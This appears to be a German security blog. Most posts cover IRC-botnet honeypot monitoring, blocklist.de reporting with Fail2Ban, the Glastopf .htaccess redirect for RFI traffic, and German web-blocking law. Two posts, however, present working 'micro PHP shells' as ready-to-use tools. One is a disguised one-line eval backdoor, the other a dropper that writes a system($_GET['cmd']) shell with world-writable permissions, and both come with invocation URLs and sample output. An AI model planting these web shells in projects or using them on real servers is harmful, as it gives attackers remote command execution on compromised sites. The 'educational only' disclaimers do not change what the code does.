BotNetzProvider.de

Ich habe meine Domain botnetzprovider.de wieder reaktiviert und schreibe nun dort ausführlich über IRC-Botnetz Monitoring.

Mein neuer Freund hat heute, so gegen 14Uhr angefangen, massiv im Internet zu scannen nach RFI (remote files inclusion) Lücken.
Dies ist natürlich nicht unentdeckt geblieben und meine Honeypots haben eine hohe Aktivität gezeigt.
Hier ein kleiner Ausschnitt aus meinen Honeypot logs:

[HIER ZUM WEITERLESEN]

Update: Bin ich davon auch betroffen? – live monitoring der IRC-c&c Server

Mit dem Namenarray des Bots abgeglichene und formatierte IP/Host Liste: HIER downloaden

Wer mit Fail2Ban z.B. SSH-Angriffe oder Einbruchsversuche via SMTP, FTP
oder über den Apache überwacht und automatisch sperren lässt, kann mit
dem Projekt von http://www.blocklist.de die Angreifer automatisiert den zuständigen Provider melden, damit diese die infizierten PC’s/Server
überprüfen, bzw. den Kunden darüber in Kenntnis setzten.

Im Vergleich zu dem direkten Reporting von Fail2Ban, sendet blocklist.de
nur alle 24 Stunden bei erneuten Angriffen ein Report, wodurch die
Abuse-Departments nicht alle paar Minuten einen Report erhalten (was
sehr nerven kann). Die Abuse-Departments können die Reports zudem für
mehrere Tage aussetzten lassen, falls diese z.B. für die Bereinigung
mehr Zeit benötigen.

Als registrierter User, sieht man über seine Server eigene Statistiken
oder kann sich mit den anderen Servern vergleichen und auch die
IP-Adressen der Angreifer für eigene Firewalls der letzten 24 Stunden
herunter laden.
Die Reports werden in X-ARF (http://www.x-arf.org/) generiert, wodurch
die Reports automatisiert verarbeitet und einfach erweitert werden können.
Die Bounce-Mails werden automatisch ausgewertet und so veraltete
Abuse-Adressen angepasst oder auf Wunsch gegen bessere Adressen ersetzt.

Die Beispiel-Konfiguration
(http://www.blocklist.de/downloads/fail2ban.config.tar.gz) muss auf den
gängigsten Systemen nur in der jail.conf bei der Absender-Adresse von
“fail2ban@DEINE-DOMAIN” durch die eigene Absender-Adresse angepasst
werden und dann kann man den Server hinzufügen und reporten oder die Reports
weiterleiten.

Ein neues kleines Projekt ist geboren:

googlesearchfoo.com

Wie ihr ja alle wisst, findet man bei Google alles mögliche, daher lohnt es sich mal vorbei zu schauen.
Auf der Webseite veröffentlichen wir alles abstruse und kuriose, dass wir bei Google mit einem Suchbegriff finden.

“Keine einzige Partei im Bundestag will es, trotzdem wird es jetzt bald in Kraft treten: ” (Zitat Spiegel Online)

1&1 schreibt zurecht: “Auferstanden aus Ruinen….”

Falls jemand Lust sich diesen Artikel mit etwas Musik zu versüßen hier ein kleiner Tipp von mir: [klick hier]

Es ist nun doch so weit, am Mittwoch den 17.Feb. 2010 wurde das Zugangserschwerungsgesetz vom Bundespräsidenten Köhler unterschrieben. Wir können uns auf dunkle Zeiten gefasst machen voll Zensur und Überwachung. Daher habe ich auch den Titel gewählt. [Info zum Titel]

Was kann nun passieren?
Zunächst einmal werden die Provider die Techniken dafür umsetzen müssen, Webseiten sperren zu können. Sollte dies implementiert worden sein, werden diese von Seiten des Staates eine Liste erhalten, welche Webseiten “gesperrt” werden sollen. Es wird den Zugriff aus die Webseite komplett blockieren indem man einfach ein “Stoppschild” einblendet und das weiter surfen verbietet. Dies soll uns vor gefährlichen Webseiten schützen, die z.B. Kinderpornographische Inhalte verbreiten.

Wer entscheidet welche Webseiten auf den Index kommen?
Das BKA wird diese Liste erstellen und an die einzelnen Provider (ISPs) verteilen. Ich hoffe sehr, dass das Übertragungsverfahren über einen sicheren Kanal läuft und die Liste nicht irgendwann auf Wikileaks oder ein BKA Beamter via Motorrad-Kurier den USB Stick vorbei bringt.

Was bringt die Zukunft?
Wir schreiben das Jahr 1984 und es ist düster. Das war der erste Schritt in die falsche Richtung. Wenn das BKA die Listen verwaltet, wer garantiert das dort nicht meine Seite drauf landet oder deine Webseite. Wer schaut dem BKA auf die Finger, dass diese Zensur nicht zu politischen oder wirtschaftlichen Zwecken ausgenutzt wird?

Wie kann ich sichergehen, dass ich unzensiert im Internet surfen kann?
Ich denke, alle die sich nur ein wenig mit dem Aufbau des Internets beschäftigt haben, stellen sich diese Frage erst gar nicht.
Aber ich werde trotzdem auf diese Frage etwas näher eingehen. Die Zensur wird sich höchstwahrscheinlich auf die vom Provider vorgegeben DNS Server auswirken. Das heißt, sollte man den DNS Server vom eigenen Provider nutzen, ist man der Zensur unterlegen.
Zwischenfrage: Deutscher Staat vs. Google INC.
Google hat es natürlich mal wieder geschickt gemacht, einen öffentlichen DNS Server zur Verfügung zu stellen. Die IP des Google DNS Servers ist: “8.8.8.8″ (diese IP ist einfach zu merken)
An alle Experten: “Ich weiss, es ist möglich einen eigenen DNS Server aufzusetzen und/oder einen ausländischen zu nutzen.
Doch ich empfehle aus Bequemlichkeit den Google DNS Server, dieser ist in nur ein paar Klicks installiert für erfahrene PC Benutzer.

*** NEUHEIT *** FreeUrsula *** NEUHEIT ***
Alle die diesen DNS Server nicht selbstständig eintragen können, nicht die Flinte ins Korn werfen, habt Geduld.
Ich werde in den nächsten Wochen ein Tool (FreeUrsula) für Windows veröffentlichen, das dies automatisch macht. Eine einfache Installationsroutine führt einen durch den FreeUrsula Installationsprozess des DNS Servers. Am Ende erhält man eine Statusanzeige in der Windows Taskbar, die entweder Grün für “ich surfe ohne Zensur im Internet” oder rot “ich surfe mit Zensur im Internet” leuchtet. Durch einen einfachen Klick auf die Statusanzeige kann man von dem “zensierten Internet” in den “unzensierten Internet” Modus umschalten.
Der Name des Programms ist noch nicht definitiv festgelegt, vielleicht kommen ja ein paar gute Zusendungen von Euch

So viel für Heute.

Hier noch ein paar Musikalische Meisterwerke
[Lied]
–
thx for the phish

Hier möchte ich kurz mal eine neue PHP-Shell euch vorstellen. Es handelt sich dabei um eine “Stand-Alone” PHP Shell, die sich auch noch in gewisser maßen “tarnt”.

test<?php @eval($_POST[code]);?>

Bei einem direkten Aufruf bekommt man ein "test" zurück. Man könnte hier auch einfachen eigenen HTML Code mitgeben. Die Shell wird ganz normal aufgerufen mit folgendem Befehl:
http://www.deine-webseite-und-nur-deine.de/shell.php?code=[foo]

Wir immer aus der Reihe der Micro PHP Shells möchte ich euch darauf hinweisen, dass ihr die Shells nur zu edukativen Zwecken verwenden werden dürfen.

Dies wird eine ganz neue Kategorie, über die ich gerne schreiben würde: “Micro PHP Shells”.

Allen sollten die “großen” PHP Shells wie: c99,r57, etc kennen. Doch was ich an diesen Shells nicht mag ist, dass die zu voll gepackt sind mit allem was man nicht wirklich braucht.

Ich möchte euch heute meine eigene kleine “micro PHP Shell” vorstellen.

<?php
$File = "shell.php";
$Handle = fopen($File, 'w');
$Data = '<?php system($_GET["cmd"]); ?>';
fwrite($Handle, $Data);
print "online";
fclose($Handle);
`chmod -R a+w $File`;
`chmod 777 $File`;
?>

Diese Shell ermöglicht es uns einen Datei mit dem Namen “shell.php” abzulegen. Da wir zuvor diese Datei mit einer macro Shell eingebunden haben () können wir die Shell nun wie folgt aufrufen:

www.deine-domain.info/pfad/shell.php?cmd?=$command

Nun können wir anstatt $command einfache Shell basierende Befehle aufrufen und diese werden direkt ausgeführt.

z.B.: www.deine-domain.info/pfad/shell.php?cmd?=ls

Nun bekommt man die Dateien in diesem Ordner angezeigt:

foo.php index.php shell.php

**** Warnung
Diese Shell sollte niemals ohne einen Schutz auf dem eigenen Webspace abgelegt werden, da jeder diese Befehle ausführen kann und es zu Datenverlust kommen kann. Dies ist nur ein theoretisches Beispiel für einen PHP-Shell.

Wie ich gerade gelesen habe schreibt auch 1&1 über den “Htaccess Generator” von Honeystats.info

Hier nochmal mein Artikel zum Nachlesen: Hier

Ich werde dann wohl bald arbeitslos …

Die deutsche Internet Welt diskutiert zur Zeit über ein Thema das uns alle angeht: Botnetze.

Botnetze sind PC’s die infiziert worden sind und zentral gesteuert werden können. Jeder Benutzer, ob Privat,-oder Geschäftlich, kann betroffen sein. Wenn es einmal so weit ist, hat man keine Kontrolle mehr über seinen Rechner. Im Hintergrund werden Mails verschickt und weitere Rechner angegriffen, ohne das man etwas davon mitbekommt.

Man kann es nicht oft genug sagen: “Immer einen aktuellen Virenscanner installiert haben!”

Doch viele Botnetze müssen erst analysiert werden, bevor man eine Lösung dem Kunden anbieten kann.
Hier kommen die Sicherheitsfirmen, Anti-Viren Hersteller und ISP’s zum Einsatz. Alle gemeinsam haben verfolgen sie ein Ziel, den Virus bzw. Bot zu erkennen und diesen zu eliminieren.

Hinter den ganzen Botnetzen steht eine “Lobby” die es versteht damit Geld zu machen, daher sollten die Gegner der Botnetze es nicht so auf die leichte Schulter nehmen. Es muss clever agiert werden um den Schaden so gering wie möglich zu halten.

Ich denke ein Zusammenschluss zwischen dem BSI der ECO und den einzelnen Providern stellt ein sehr mächtiges Bündnis gegen Botnetze dar.

Die Kunden werden von Ihren Providern benachrichtigt, dass sie befallen sind mit einem Virus oder Bot. Jetzt können sich nicht so erfahrene Kunden an das Call-Center richten, welches für solche Fälle eingerichtet wird.
Dort werden kompetente Mitarbeiter sitzen die in aller Ruhe, zusammen mit dem Kunden, den Befall beseitigen werden.

Sobald ich was neues höre werde ich Euch auf dem Laufenden halten…

Das Honeypot-Projekt Glastopf.org hat in Zusammenarbeit mit 1&1 eine neue
Webseite ins Leben gerufen.

Auf der Webseite Honeystats.info finden sich statistische Auswertungen und Kontaktdaten zur Teilnahme am Glastopf Honeypot-Projekt.

Da sich die Webseite stetig vergrößert, lohnt es sich ab und zu einmal vorbei zu schauen.

Besonders hervorheben möchte ich den neuen Htaccess Generator

Was ist der Htaccess-Generator?
Der Htaccess-Generator ist ein Skript welches euch eine “.htaccess”
Datei mit eigener ID generiert.
Mit Hilfe dieser Weiterleitung kann schadhafter Traffic (momentan RFI sowie LFI/etc) zu uns umgeleitet werden, ohne einen eigenen Glastopf Honeypot betreiben zu müssen.

Durch das Weiterleiten helft Ihr uns, die Angreifer schneller zu
erkennen. Die gewonnenen Daten werden dann analysiert und an die
jeweiligen Abuse-Abteilungen der Provider weitergeleitet. So
nehmen wir die Angreifer schnellstmöglichst vom Netz.

Mit der ID könnt Ihr später eure Statistiken ansehen bzw. wieviele Angriffe
ihr zu uns umgeleitet habt.

Wie setze ich die “.htaccess” Datei ein?
Die “.htaccess” Datei legt ihr ins www-root Verzeichnis eurer Webseite.

Bitte denkt daran, die Datei “.htaccess” zu nennen und nicht nur
“htaccess” (der “.” (Punkt) macht den Unterschied!)

Wie sieht die “.htaccess” Datei aus?
Hier ein Beispiel für die “.htaccess” Datei:

####################################
### Generated by honeystats.info ###
####################################

Options +FollowSymlinks
RewriteEngine on

RewriteCond %{QUERY_STRING} ^.*(=([a-zA-Z0-9]{3,}:\/\/)).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(=([a-zA-Z0-9]{1,}\.){1,2}[a-zA-Z0-9]{2,}).* [NC]
RewriteRule ^(.+)$ http://www.htaccess2feeds.com/id123456789/$1?%{QUERY_STRING}

####################################
# Save your ID for further lookups: #
# ID: 123456789 #
####################################

Kopiert diese Datei und fügt Sie in euer root Verzeichnis Eurer Domain ein. Benennt die Datei “.htaccess”.

Was mache ich wenn ich schon eine “.htaccess” Datei habe?
Solltet Ihr schon eine “.htaccess” Datei verwenden ist dies kein
Problem. Fügt den für Euch generierten Code einfach unter dem bereits
vorhandenen ein.

Bitte beachten: Die Rewrite-Engine muss an sein, sonst geht die Weiterleitung nicht!

Was kostet dieser Service?
Nichts. Nada. Null.

Wie teste ich die “.htaccess” ?
1. Öffne den folgenden Link:

http://www.your-domain.com/INTERNAL_TEST/check.php?check=http://honeystats.info/download/check/check

2. Ersetze “your-domain.com” durch deine eigene Domain.

3. Solltest du das Ergebnis bekommen hat es funktioniert und deine “.htaccess” funktioniert:
“1&1 htaccess check it works”

Was mache ich wenn ich fragen habe?
Einfach fragen.
Mich (Mike) könnt Ihr per E-Mail unter mike@honeystats.info erreichen oder besucht uns im IRC unter irc://irc.freenode.net/glastopf

Wir ich heute bei heise.de gelesen habe ist wieder ein deutscher Botnetzbetreiber geschnappt worden.
Die Razzia wurde nach einer einjährigen Observation eines deutschsprachigen Forums durchgeführt. Betroffen waren fast 50 Wohnungen in Deutschland und Österreich.

Das wars mit der “Elite Crew 1337″
Und so was schimpft sich echt noch “Elite”. Jetzt helfen euch auch nicht mehr eure billigen Proxy.